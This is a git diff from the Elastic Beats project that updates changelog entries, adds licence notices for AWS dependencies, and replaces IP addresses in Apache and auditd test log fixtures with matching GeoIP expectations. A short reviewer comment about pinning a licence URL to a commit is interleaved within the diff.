diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index e051fb3b7fab..12a161a42a13 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -27,7 +27,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - add_docker_metadata processor: Replace usage of deprecated `process.ppid` field with `process.parent.pid`. {pull}28620[28620] - Use data streams instead of indices for storing events from Beats. {pull}28450[28450] - Remove option `setup.template.type` and always load composable template with data streams. {pull}28450[28450] -- Remove several ILM options (`rollover_alias` and `pattern`) as data streams does not require index aliases. {pull}28450[28450] +- Remove several ILM options (`rollover_alias` and `pattern`) as data streams does not require index aliases. {pull}28450[28450] - Index template's default_fields setting is only populated with ECS fields. {pull}28596[28596] {issue}28215[28215] - Remove `auto` from the available options of `setup.ilm.enabled` and set the default value to `true`. {pull}28671[28671] - Remove deprecated `--template` and `--ilm-policy` flags. Use `--index-management` instead. {pull}28870[28870] @@ -360,6 +360,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Improve error handling in aws-s3 input for malformed s3 notifications. {issue}28828[28828] {pull}28946[28946] - Add support for parsers on journald input {pull}29070[29070] - Add support in httpjson input for oAuth2ProviderDefault of password grant_type. {pull}29087[29087] +- Add elapsed time information to `aws-s3` input errors and log messages. {pull}29328[29328] *Heartbeat* @@ -389,6 +390,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d *Functionbeat* +- Add support for AWS Kinesis record deaggregation {pull}28241[28241] *Winlogbeat* diff --git a/NOTICE.txt b/NOTICE.txt index 57d437d253ba..d9548c67fccb 100644 --- a/NOTICE.txt +++ b/NOTICE.txt 
@@ -2444,6 +2444,218 @@ Contents of probable licence file $GOMODCACHE/github.com/aws/aws-lambda-go@v1.13 +-------------------------------------------------------------------------------- +Dependency : github.com/aws/aws-sdk-go +Version: v1.19.48 +Licence type (autodetected): Apache-2.0 +-------------------------------------------------------------------------------- + +Contents of probable licence file $GOMODCACHE/github.com/aws/aws-sdk-go@v1.19.48/LICENSE.txt: + + + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. 
+ + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. 
Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. 
You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. 
+ + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. 
In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. 
+ + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. + + -------------------------------------------------------------------------------- Dependency : github.com/aws/aws-sdk-go-v2 Version: v0.24.0 @@ -2867,6 +3079,14 @@ Contents of probable licence file $GOMODCACHE/github.com/awslabs/goformation/v4@ limitations under the License. +-------------------------------------------------------------------------------- +Dependency : github.com/awslabs/kinesis-aggregation/go +Version: v0.0.0-20200810181507-d352038274c0 +Licence type (autodetected): Apache-2.0 +-------------------------------------------------------------------------------- + +No licence file provided. + -------------------------------------------------------------------------------- Dependency : github.com/blakesmith/ar Version: v0.0.0-20150311145944-8bd4349a67f2 diff --git a/dev-tools/notice/overrides.json b/dev-tools/notice/overrides.json index 6e2e2a2f505a..a4e8a78e568f 100644 --- a/dev-tools/notice/overrides.json +++ b/dev-tools/notice/overrides.json 
@@ -12,4 +12,5 @@
 {"name": "github.com/pelletier/go-buffruneio", "licenceType": "MIT"}
 {"name": "github.com/urso/magetools", "licenceType": "Apache-2.0"}
 {"name": "kernel.org/pub/linux/libs/security/libcap/cap", "licenceType": "BSD-3-Clause", "note": "dual licensed as GPL-v2 and BSD"}
-{"name": "kernel.org/pub/linux/libs/security/libcap/psx", "licenceType": "BSD-3-Clause", "note": "dual licensed as GPL-v2 and BSD"}
\ No newline at end of file
+{"name": "kernel.org/pub/linux/libs/security/libcap/psx", "licenceType": "BSD-3-Clause", "note": "dual licensed as GPL-v2 and BSD"}
+{"name": "github.com/awslabs/kinesis-aggregation/go", "licenceType": "Apache-2.0", "url": "https://github.com/awslabs/kinesis-aggregation/blob/master/LICENSE.txt"}
diff --git a/filebeat/module/apache/access/test/darwin-2.4.23.log b/filebeat/module/apache/access/test/darwin-2.4.23.log
index 1498b23dedd3..6b1ba50b1776 100644
--- a/filebeat/module/apache/access/test/darwin-2.4.23.log
+++ b/filebeat/module/apache/access/test/darwin-2.4.23.log
@@ -1,6 +1,6 @@
 ::1 - - [26/Dec/2016:16:16:28 +0200] "GET / HTTP/1.1" 200 45
 ::1 - - [26/Dec/2016:16:16:29 +0200] "GET /favicon.ico HTTP/1.1" 404 209
 ::1 - - [26/Dec/2016:16:16:48 +0200] "-" 408 -
-77.179.66.156 - - [26/Dec/2016:18:23:35 +0200] "GET / HTTP/1.1" 200 45
-77.179.66.156 - - [26/Dec/2016:18:23:41 +0200] "GET /notfound HTTP/1.1" 404 206
-77.179.66.156 - - [26/Dec/2016:18:23:45 +0200] "GET /hmm HTTP/1.1" 404 201
+89.160.20.156 - - [26/Dec/2016:18:23:35 +0200] "GET / HTTP/1.1" 200 45
+89.160.20.156 - - [26/Dec/2016:18:23:41 +0200] "GET /notfound HTTP/1.1" 404 206
+89.160.20.156 - - [26/Dec/2016:18:23:45 +0200] "GET /hmm HTTP/1.1" 404 201
diff --git a/filebeat/module/apache/access/test/darwin-2.4.23.log-expected.json b/filebeat/module/apache/access/test/darwin-2.4.23.log-expected.json
index 468bfb9fdc9e..11555973684c 100644
--- a/filebeat/module/apache/access/test/darwin-2.4.23.log-expected.json
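Review bot: The `url` in the new `github.com/awslabs/kinesis-aggregation/go` override points at the `master` branch of the upstream repository, while the dependency itself is pinned in NOTICE.txt to pseudo-version `v0.0.0-20200810181507-d352038274c0`; a branch URL can later resolve to a licence that differs from the one shipped with the vendored commit. Since the generated NOTICE.txt entry reads "No licence file provided.", this override is currently the only record of the licence for that module, so it is worth tying it to the exact revision. If the notice tooling accepts a commit-scoped link, something like `"url": "https://github.com/awslabs/kinesis-aggregation/blob/d352038274c0/LICENSE.txt"` (path built from the pseudo-version above) keeps the attribution bound to the code actually in use.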
+++ b/filebeat/module/apache/access/test/darwin-2.4.23.log-expected.json
@@ -67,7 +67,7 @@
 "event.dataset": "apache.access",
 "event.kind": "event",
 "event.module": "apache",
- "event.original": "77.179.66.156 - - [26/Dec/2016:18:23:35 +0200] \"GET / HTTP/1.1\" 200 45",
+ "event.original": "89.160.20.156 - - [26/Dec/2016:18:23:35 +0200] \"GET / HTTP/1.1\" 200 45",
 "event.outcome": "success",
 "fileset.name": "access",
 "http.request.method": "GET",
@@ -77,18 +77,18 @@
 "input.type": "log",
 "log.offset": 181,
 "service.type": "apache",
- "source.address": "77.179.66.156",
- "source.as.number": 6805,
- "source.as.organization.name": "Telefonica Germany",
- "source.geo.city_name": "Germersheim",
+ "source.address": "89.160.20.156",
+ "source.as.number": 29518,
+ "source.as.organization.name": "Bredband2 AB",
+ "source.geo.city_name": "Link\u00f6ping",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "DE",
- "source.geo.country_name": "Germany",
- "source.geo.location.lat": 49.2231,
- "source.geo.location.lon": 8.3639,
- "source.geo.region_iso_code": "DE-RP",
- "source.geo.region_name": "Rheinland-Pfalz",
- "source.ip": "77.179.66.156",
+ "source.geo.country_iso_code": "SE",
+ "source.geo.country_name": "Sweden",
+ "source.geo.location.lat": 58.4167,
+ "source.geo.location.lon": 15.6167,
+ "source.geo.region_iso_code": "SE-E",
+ "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+ "source.ip": "89.160.20.156",
 "url.original": "/",
 "url.path": "/",
 "user.name": "-"
@@ -99,7 +99,7 @@
 "event.dataset": "apache.access",
 "event.kind": "event",
 "event.module": "apache",
- "event.original": "77.179.66.156 - - [26/Dec/2016:18:23:41 +0200] \"GET /notfound HTTP/1.1\" 404 206",
+ "event.original": "89.160.20.156 - - [26/Dec/2016:18:23:41 +0200] \"GET /notfound HTTP/1.1\" 404 206",
 "event.outcome": "failure",
 "fileset.name": "access",
 "http.request.method": "GET",
@@ -109,18 +109,18 @@
 "input.type": "log",
 "log.offset": 252,
 "service.type": "apache",
- "source.address": "77.179.66.156",
- "source.as.number": 6805,
- "source.as.organization.name": "Telefonica Germany",
- "source.geo.city_name": "Germersheim",
+ "source.address": "89.160.20.156",
+ "source.as.number": 29518,
+ "source.as.organization.name": "Bredband2 AB",
+ "source.geo.city_name": "Link\u00f6ping",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "DE",
- "source.geo.country_name": "Germany",
- "source.geo.location.lat": 49.2231,
- "source.geo.location.lon": 8.3639,
- "source.geo.region_iso_code": "DE-RP",
- "source.geo.region_name": "Rheinland-Pfalz",
- "source.ip": "77.179.66.156",
+ "source.geo.country_iso_code": "SE",
+ "source.geo.country_name": "Sweden",
+ "source.geo.location.lat": 58.4167,
+ "source.geo.location.lon": 15.6167,
+ "source.geo.region_iso_code": "SE-E",
+ "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+ "source.ip": "89.160.20.156",
 "url.original": "/notfound",
 "url.path": "/notfound",
 "user.name": "-"
@@ -131,7 +131,7 @@
 "event.dataset": "apache.access",
 "event.kind": "event",
 "event.module": "apache",
- "event.original": "77.179.66.156 - - [26/Dec/2016:18:23:45 +0200] \"GET /hmm HTTP/1.1\" 404 201",
+ "event.original": "89.160.20.156 - - [26/Dec/2016:18:23:45 +0200] \"GET /hmm HTTP/1.1\" 404 201",
 "event.outcome": "failure",
 "fileset.name": "access",
 "http.request.method": "GET",
@@ -141,18 +141,18 @@
 "input.type": "log",
 "log.offset": 332,
 "service.type": "apache",
- "source.address": "77.179.66.156",
- "source.as.number": 6805,
- "source.as.organization.name": "Telefonica Germany",
- "source.geo.city_name": "Germersheim",
+ "source.address": "89.160.20.156",
+ "source.as.number": 29518,
+ "source.as.organization.name": "Bredband2 AB",
+ "source.geo.city_name": "Link\u00f6ping",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "DE",
- "source.geo.country_name": "Germany",
- "source.geo.location.lat": 49.2231,
- "source.geo.location.lon": 8.3639,
- "source.geo.region_iso_code": "DE-RP",
- "source.geo.region_name": "Rheinland-Pfalz",
- "source.ip": "77.179.66.156",
+ "source.geo.country_iso_code": "SE",
+ "source.geo.country_name": "Sweden",
+ "source.geo.location.lat": 58.4167,
+ "source.geo.location.lon": 15.6167,
+ "source.geo.region_iso_code": "SE-E",
+ "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+ "source.ip": "89.160.20.156",
 "url.original": "/hmm",
 "url.path": "/hmm",
 "user.name": "-"
diff --git a/filebeat/module/apache/access/test/ssl-request.log b/filebeat/module/apache/access/test/ssl-request.log
index 5b65e3235d52..ddb7235b9e22 100644
--- a/filebeat/module/apache/access/test/ssl-request.log
+++ b/filebeat/module/apache/access/test/ssl-request.log
@@ -1,2 +1,2 @@
 [10/Aug/2018:09:45:56 +0200] 172.30.0.119 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "GET /nagiosxi/ajaxhelper.php?cmd=getxicoreajax&opts=%7B%22func%22%3A%22get_admin_tasks_html%22%2C%22args%22%3A%22%22%7D&nsp=b5c7d5d4b6f7d0cf0c92f9cbdf737f6a5c838218425e6ae21 HTTP/1.1" 1375
-[16/Oct/2019:11:53:47 +0200] 11.19.0.217 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "GET /appl/ajaxhelper.php?cmd=getxicoreajax&opts=%7B%22func%22%3A%22get_pagetop_alert_content_html%22%2C%22args%22%3A%22%22%7D&nsp=c2700eab9797eda8a9f65a3ab17a6adbceccd60a6cca7708650a5923950d HTTP/1.1" -
+[16/Oct/2019:11:53:47 +0200] 81.2.69.143 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "GET /appl/ajaxhelper.php?cmd=getxicoreajax&opts=%7B%22func%22%3A%22get_pagetop_alert_content_html%22%2C%22args%22%3A%22%22%7D&nsp=c2700eab9797eda8a9f65a3ab17a6adbceccd60a6cca7708650a5923950d HTTP/1.1" -
diff --git a/filebeat/module/apache/access/test/ssl-request.log-expected.json b/filebeat/module/apache/access/test/ssl-request.log-expected.json
index 6b4288724b18..61ced38ae636 100644
--- a/filebeat/module/apache/access/test/ssl-request.log-expected.json
+++ b/filebeat/module/apache/access/test/ssl-request.log-expected.json
@@ -33,20 +33,23 @@
 "event.dataset": "apache.access",
 "event.kind": "event",
 "event.module": "apache",
- "event.original": "[16/Oct/2019:11:53:47 +0200] 11.19.0.217 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 \"GET /appl/ajaxhelper.php?cmd=getxicoreajax&opts=%7B%22func%22%3A%22get_pagetop_alert_content_html%22%2C%22args%22%3A%22%22%7D&nsp=c2700eab9797eda8a9f65a3ab17a6adbceccd60a6cca7708650a5923950d HTTP/1.1\" -",
+ "event.original": "[16/Oct/2019:11:53:47 +0200] 81.2.69.143 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 \"GET /appl/ajaxhelper.php?cmd=getxicoreajax&opts=%7B%22func%22%3A%22get_pagetop_alert_content_html%22%2C%22args%22%3A%22%22%7D&nsp=c2700eab9797eda8a9f65a3ab17a6adbceccd60a6cca7708650a5923950d HTTP/1.1\" -",
 "fileset.name": "access",
 "http.request.method": "GET",
 "http.version": "1.1",
 "input.type": "log",
 "log.offset": 276,
 "service.type": "apache",
- "source.address": "11.19.0.217",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.751,
- "source.geo.location.lon": -97.822,
- "source.ip": "11.19.0.217",
+ "source.address": "81.2.69.143",
+ "source.geo.city_name": "London",
+ "source.geo.continent_name": "Europe",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tls.cipher": "ECDHE-RSA-AES128-GCM-SHA256",
 "tls.version": "1.2",
 "tls.version_protocol": "tls",
diff --git a/filebeat/module/apache/error/test/sublevel.log-expected.json b/filebeat/module/apache/error/test/sublevel.log-expected.json
index 26ad0e275386..43ed49a67c50 100644
--- a/filebeat/module/apache/error/test/sublevel.log-expected.json
+++ b/filebeat/module/apache/error/test/sublevel.log-expected.json
@@ -18,4 +18,4 @@
 "process.thread.id": 140413273032448,
 "service.type": "apache"
 }
-]
+]
\ No newline at end of file
diff --git a/filebeat/module/apache/error/test/test.log b/filebeat/module/apache/error/test/test.log
index de56f84779dc..c8229f797156 100644
--- a/filebeat/module/apache/error/test/test.log
+++ b/filebeat/module/apache/error/test/test.log
@@ -1,4 +1,4 @@
 [Mon Dec 26 16:22:08 2016] [error] [client 192.168.33.1] File does not exist: /var/www/favicon.ico
 [Mon Dec 26 16:15:55.103786 2016] [core:notice] [pid 11379] AH00094: Command line: '/usr/local/Cellar/httpd24/2.4.23_2/bin/httpd'
-[Fri Sep 09 10:42:29.902022 2011] [core:error] [pid 35708:tid 4328636416] [client 72.15.99.187] File does not exist: /usr/local/apache2/htdocs/favicon.ico
-[Thu Jun 27 06:58:09.169510 2019] [include:warn] [pid 15934] [client 123.123.123.123:12345] AH01374: mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed: /test.html
+[Fri Sep 09 10:42:29.902022 2011] [core:error] [pid 35708:tid 4328636416] [client 89.160.20.112] File does not exist: /usr/local/apache2/htdocs/favicon.ico
+[Thu Jun 27 06:58:09.169510 2019] [include:warn] [pid 15934] [client 67.43.156.12:12345] AH01374: mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed: /test.html
diff --git a/filebeat/module/apache/error/test/test.log-expected.json b/filebeat/module/apache/error/test/test.log-expected.json
index 6bbb6067469b..38854b87a2ef 100644
--- a/filebeat/module/apache/error/test/test.log-expected.json
+++ b/filebeat/module/apache/error/test/test.log-expected.json
@@ -43,7 +43,7 @@
 "event.dataset": "apache.error",
 "event.kind": "event",
 "event.module": "apache",
- "event.original": "[Fri Sep 09 10:42:29.902022 2011] [core:error] [pid 35708:tid 4328636416] [client 72.15.99.187] File does not exist: /usr/local/apache2/htdocs/favicon.ico",
+ "event.original": "[Fri Sep 09 10:42:29.902022 2011] [core:error] [pid 35708:tid 4328636416] [client 89.160.20.112] File does not exist: /usr/local/apache2/htdocs/favicon.ico",
 "event.timezone": "-02:00",
 "event.type": "error",
 "file.path": "/usr/local/apache2/htdocs/favicon.ico",
@@ -55,18 +55,18 @@
 "process.pid": 35708,
 "process.thread.id": 4328636416,
 "service.type": "apache",
- "source.address": "72.15.99.187",
- "source.as.number": 11693,
- "source.as.organization.name": "WideOpenWest Finance LLC",
- "source.geo.city_name": "Newnan",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 33.3708,
- "source.geo.location.lon": -84.8154,
- "source.geo.region_iso_code": "US-GA",
- "source.geo.region_name": "Georgia",
- "source.ip": "72.15.99.187"
+ "source.address": "89.160.20.112",
+ "source.as.number": 29518,
+ "source.as.organization.name": "Bredband2 AB",
+ "source.geo.city_name": "Link\u00f6ping",
+ "source.geo.continent_name": "Europe",
+ "source.geo.country_iso_code": "SE",
+ "source.geo.country_name": "Sweden",
+ "source.geo.location.lat": 58.4167,
+ "source.geo.location.lon": 15.6167,
+ "source.geo.region_iso_code": "SE-E",
+ "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+ "source.ip": "89.160.20.112"
 },
 {
 "@timestamp": "2019-06-27T06:58:09.169-02:00",
@@ -75,28 +75,24 @@
 "event.dataset": "apache.error",
 "event.kind": "event",
 "event.module": "apache",
- "event.original": "[Thu Jun 27 06:58:09.169510 2019] [include:warn] [pid 15934] [client 123.123.123.123:12345] AH01374: mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed: /test.html",
+ "event.original": "[Thu Jun 27 06:58:09.169510 2019] [include:warn] [pid 15934] [client 67.43.156.12:12345] AH01374: mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed: /test.html",
 "event.timezone": "-02:00",
 "event.type": "error",
 "fileset.name": "error",
 "input.type": "log",
 "log.level": "warn",
- "log.offset": 384,
+ "log.offset": 385,
 "message": "AH01374: mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed: /test.html",
 "process.pid": 15934,
 "service.type": "apache",
- "source.address": "123.123.123.123",
- "source.as.number": 4808,
- "source.as.organization.name": "China Unicom Beijing Province Network",
- "source.geo.city_name": "Beijing",
+ "source.address": "67.43.156.12",
+ "source.as.number": 35908,
 "source.geo.continent_name": "Asia",
- "source.geo.country_iso_code": "CN",
- "source.geo.country_name": "China",
- "source.geo.location.lat": 39.9288,
- "source.geo.location.lon": 116.3889,
- "source.geo.region_iso_code": "CN-BJ",
- "source.geo.region_name": "Beijing",
- "source.ip": "123.123.123.123",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.12",
 "source.port": "12345"
 }
 ]
\ No newline at end of file
diff --git a/filebeat/module/auditd/log/test/audit-rhel6.log b/filebeat/module/auditd/log/test/audit-rhel6.log
index dceee8427109..9de386df73bc 100644
--- a/filebeat/module/auditd/log/test/audit-rhel6.log
+++ b/filebeat/module/auditd/log/test/audit-rhel6.log
@@ -6,7 +6,7 @@ type=USER_START msg=audit(1489519256.193:19600331): user pid=4151 uid=0 auid=700
 type=MAC_IPSEC_EVENT msg=audit(1489519382.529:19600354): op=SPD-add auid=4294967295 ses=4294967295 res=1 src=10.100.0.0 src_prefixlen=16 dst=10.100.4.0 dst_prefixlen=22
 type=SYSCALL msg=audit(1489519382.529:19600354): arch=c000003e syscall=44 success=yes exit=184 a0=9 a1=7f564ee6d2a0 a2=b8 a3=0 items=0 ppid=1240 pid=1275 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="charon" exe=2F7573722F6C6962657865632F7374726F6E677377616E2F636861726F6E202864656C6574656429 key=(null)
 type=LOGIN msg=audit(1489636960.072:19623791): pid=28281 uid=0 old auid=700 new auid=700 old ses=6793 new ses=12286
-type=CRYPTO_KEY_USER msg=audit(1489636960.070:19623788): user pid=28281 uid=0 auid=700 ses=6793 msg='op=destroy kind=session fp=? direction=both spid=28282 suid=74 rport=58994 laddr=107.170.139.210 lport=50022 exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=USER_AUTH msg=audit(1489636960.072:19623789): user pid=28281 uid=0 auid=700 ses=6793 msg='op=success acct="admin" exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=ssh res=success'
+type=CRYPTO_KEY_USER msg=audit(1489636960.070:19623788): user pid=28281 uid=0 auid=700 ses=6793 msg='op=destroy kind=session fp=? direction=both spid=28282 suid=74 rport=58994 laddr=107.170.139.210 lport=50022 exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=USER_AUTH msg=audit(1489636960.072:19623789): user pid=28281 uid=0 auid=700 ses=6793 msg='op=success acct="admin" exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=ssh res=success'
 type=USER_AUTH msg=audit(1489636977.804:19623807): user pid=28395 uid=0 auid=700 ses=12286 msg='op=PAM:authentication acct="root" exe="/bin/su" hostname=? addr=? 
terminal=pts/0 res=success'
 type=USER_ACCT msg=audit(1489636977.805:19623808): user pid=28395 uid=0 auid=700 ses=12286 msg='op=PAM:accounting acct="root" exe="/bin/su" hostname=? addr=? terminal=pts/0 res=success'
diff --git a/filebeat/module/auditd/log/test/audit-rhel6.log-expected.json b/filebeat/module/auditd/log/test/audit-rhel6.log-expected.json
index 7a1ba951e3b6..f7eb39a6d14d 100644
--- a/filebeat/module/auditd/log/test/audit-rhel6.log-expected.json
+++ b/filebeat/module/auditd/log/test/audit-rhel6.log-expected.json
@@ -278,7 +278,7 @@
 "event.dataset": "auditd.log",
 "event.kind": "event",
 "event.module": "auditd",
- "event.original": "type=CRYPTO_KEY_USER msg=audit(1489636960.070:19623788): user pid=28281 uid=0 auid=700 ses=6793 msg='op=destroy kind=session fp=? direction=both spid=28282 suid=74 rport=58994 laddr=107.170.139.210 lport=50022 exe=\"/usr/sbin/sshd\" hostname=? addr=96.241.146.97 terminal=? res=success'",
+ "event.original": "type=CRYPTO_KEY_USER msg=audit(1489636960.070:19623788): user pid=28281 uid=0 auid=700 ses=6793 msg='op=destroy kind=session fp=? direction=both spid=28282 suid=74 rport=58994 laddr=107.170.139.210 lport=50022 exe=\"/usr/sbin/sshd\" hostname=? addr=216.160.83.61 terminal=? res=success'",
 "event.outcome": "success",
 "event.type": [
 "info"
